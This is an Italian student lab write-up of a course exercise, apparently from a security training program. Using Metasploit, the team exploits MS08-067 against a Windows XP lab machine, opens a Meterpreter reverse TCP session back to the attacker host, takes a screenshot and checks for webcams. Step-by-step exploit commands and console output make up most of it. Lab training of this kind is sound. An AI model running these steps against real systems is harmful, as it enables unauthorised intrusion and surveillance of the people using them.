S7_L3

Esercizio

Viene richiesto di ottenere una sessione di Meterpreter sul target Windows XP sfruttando con Metasploit la vulnerabilità MS08-067. Una volta ottenuta la sessione, si dovrà:

- Recuperare uno screenshot tramite la sessione Meterpreter.
- Individuare la presenza o meno di Webcam sulla macchina Windows XP (opzionale).

Esecuzione

• Dopo aver avviato con successo metasplotable sulla macchina virtuale kali con il comando "msfconsole" abbiamo individuato il modello del exploit tramite la ricerca "search MS08-067".

 Per selezionare il modulo abbiamo usato il comando "use 0", che equivale a "use <nome dell'exploit>"

```
msf6 > use0
[-] Unknown command: use0
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
```

• Con il comando show options abbiamo potuto ottenere le informazioni sull'exploit MS08. In particolare abbiamo potuto osservare quali campi erano neccessari per la riuscita dell'exploit.

```
msf6 exploit(
Module options (exploit/windows/smb/ms08 067 netapi):
   Name
               Current Setting Required Description
                                               The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
The SMB service port (TCP)
The pipe name to use (BROWSER, SRVSVC)
   RHOSTS
   RPORT
    SMBPIPE BROWSER
Payload options (windows/meterpreter/reverse_tcp):
                Current Setting Required Description
                                      yes Exit technique (Accepted: '', seh, thread, process, none)
yes The listen address (an interface may be specified)
yes The listen port
                thread
192.168.50.103 yes
yes
Exploit target:
   Id Name
       Automatic Targeting
View the full module info with the info, or info -d command.
```

 Abbiamo settato l'indirizzo della nostra macchina target in questo caso "windows XP" con in seguente indirizzo IP "192.168.50.105"

```
) > set RHOST 192.168.50.105
msf6 exploit(
RHOST ⇒ 192.168.50.105
                                     netapi) > show options
<u>msf6</u> exploit(
Module options (exploit/windows/smb/ms08_067_netapi):
             Current Setting Required Description
                                          The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RHOSTS 192.168.50.105 yes
   RPORT
                                          The SMB service port (TCP)
   SMBPIPE BROWSER
                                          The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
   Name
              Current Setting Required Description
   EXITFUNC thread
                                           Exit technique (Accepted: '', seh, thread, process, none)
The listen address (an interface may be specified)
              192.168.50.103
                                           The listen port
   LPORT
```

 Dopo aver configurato i dati mancanti abbiamo lanciato l'attacco con il comando "exploit", che fa apparire il prompt "meterpreter" se andato a buon fine.

```
msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.50.103:4444
[*] 192.168.50.105:445 - Automatically detecting the target ...
[*] 192.168.50.105:445 - Fingerprint: Windows XP - Service Pack 3 - lang:Italian
[*] 192.168.50.105:445 - Selected Target: Windows XP SP3 Italian (NX)
[*] 192.168.50.105:445 - Attempting to trigger the vulnerability ...
[*] Sending stage (176198 bytes) to 192.168.50.105
[*] Meterpreter session 1 opened (192.168.50.103:4444 → 192.168.50.105:1031) at 2024-05-21 04:52:03 -0400

meterpreter > sysinfo
Computer : TEST-EPI
OS : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture : x86
System Language : it_IT
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
```

• Dopo aver confermato che l'attacco è andato a buon fine abbiamo chiesto di eseguire uno "screenshot" andato a buon fine.



• In seguito abbiamo provato con il comando "webcam_list" per controllare se ci fosse una webcam connessa, non è stata riscontrata la presenza di webcam

```
meterpreter > webcam_list
[-] No webcams_were found
```

TEAM 2

Fabio Nobili - Noemi de Martino - Andrea di Benedetto - Mario Reitano - Danilo Malagoli - Samuele Aversa